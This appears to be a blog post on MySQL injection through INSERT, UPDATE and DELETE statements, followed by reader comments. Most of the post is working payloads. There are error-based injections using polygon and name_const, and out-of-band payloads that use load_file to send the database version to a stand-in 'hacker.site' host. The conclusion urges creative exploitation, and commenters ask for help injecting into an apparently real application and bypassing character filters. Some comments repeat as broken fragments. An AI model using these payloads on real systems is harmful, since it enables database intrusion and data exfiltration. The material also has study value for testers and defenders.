# Overview

The traditional in-band method in INSERT, UPDATE injections would be by fixing the query. For example in INSERT statements one can simply fix the query, comment out the rest and extract the data once it is echoed out by the application. Same goes with the UPDATE statement, but only if the query has more than one column we can fix the query. What if we face a situation where UPDATE or INSERT has one column or simply we don’t know the exact query to fix? What if mysql_error() is not echoed out?
Let’s look at the following scenario. For simplicity’s sake let’s not make things complex. The updated username is also echoed back to us. How can we inject in this scenario?





We can inject like this if the value of ‘$user’ is echoed back to us by the application. id=16',(SELECT @@version), 'XXX');-- -&user=test&pass=test  # Error Based Injection I wrote a paper on injections in Insert, Update and Delete statements back in the days (I was 17 years to be precise, I feel like I should have written it in a better way :)). You can use any error based vector by following the same syntax like these examples. ## Update Statement UPDATE users SET password = 'osanda'*multipoint((select*from(select name_const(version(),1))x))*'' WHERE id='16' ;  UPDATE users SET password = 'osanda' WHERE id='16'*polygon((select*from(select name_const(version(),1))x))*'' ;  ## Insert Statement INSERT INTO users VALUES (17,'james', 'bond'*polygon((select*from(select name_const(version(),1))x))*'');  ## Delete Statement DELETE FROM users WHERE id='17'*polygon((select*from(select name_const(version(),1))x))*'';  Instead of ‘*’ you can use ||, or, |, and, &&, &, >>, <<, ^, xor, <=, <, ,>, >=, mul, /, div, -, +, %, mod. # Out-of-Band (OOB) Injections You can check my previous research which I have described in detail about MySQL OOB techniques under Windows. The same methods can be applied in ‘INSERT’, ‘UPDATE’ and ‘DELETE’ statements. ## Update Statement UPDATE users SET username = 'osanda'<=>load_file(concat('\\\\',version(),'.hacker.siste\\a.txt')) WHERE id='15'; UPDATE users SET username = 'osanda' WHERE id='15'*load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));  ## Insert Statement INSERT into users VALUES (15,'james','bond'|load_file(concat('\\\\',version(),'.hacker.site\\a.txt')));  ## Delete Statement DELETE FROM users WHERE id='15'*load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));  You can use ||, or, |, and, &&, &, >>, <<, ^, xor, <=, <, ,>, >=, *,mul, /, div, -, +, %, mod. # Conclusion Exploitation of a vulnerability is not straight forward in real world scenarios. It’s up to you to make use of these techniques and come with a creative solution in the exploitation of SQL injection vulnerabilities. Analyze the situation and depending on the situation apply the correct techniques. # Acknowledgements Special thanks to Mukarram Khalid (@themakmaniac) for reviewing and testing my research. # Paper # References http://dev.mysql.com/doc/refman/5.7/en/ SQLi is often a cancerous topic, if you plan to copy or share please give credits to the author. [tweet https://twitter.com/x33fcon/status/833596164788281348] ## 14 thoughts on “MySQL Injection in Update, Insert and Delete” 1.$addr= $_POST[‘addr’]; mysql_query(“Update account SET adr=’$addr’ where username=’$user'”); ……… …….. if($addr1[‘addr’] != ”){
echo $btcadr1[‘addr_adr’]; }else { echo ‘You havent added an address yet.’; } how i can inject in this statement ! • The exact same problem and solution I have explained here 🙂 • I’m a beginner so could you explain me more ! for example i wanna grab the database name what the post i should send ! • Send me your app I’ll have a look 2. The zero value returned for your string is probably because it’s not in the table (Boolean false).. yeah, it may be represented with 64bits 3. ’; } how i can inject in this statement ! 4. ’; } how i can inject in this statement ! 5. ’; } how i can inject in this statement ! 6. The exact same problem and solution I have explained here ? ’; } how i can inject in this statement ! 7. Hey what if all the special characters are block but there an sqli so how we can bypass it. Example for special characters ( + , * ,- ,/, \ ,() ,$, & ,#, @,=, ; ,”, ‘ , ? , _ , % )
Such blacklisting of special characters can help to overcome sqli or there is an bypass ?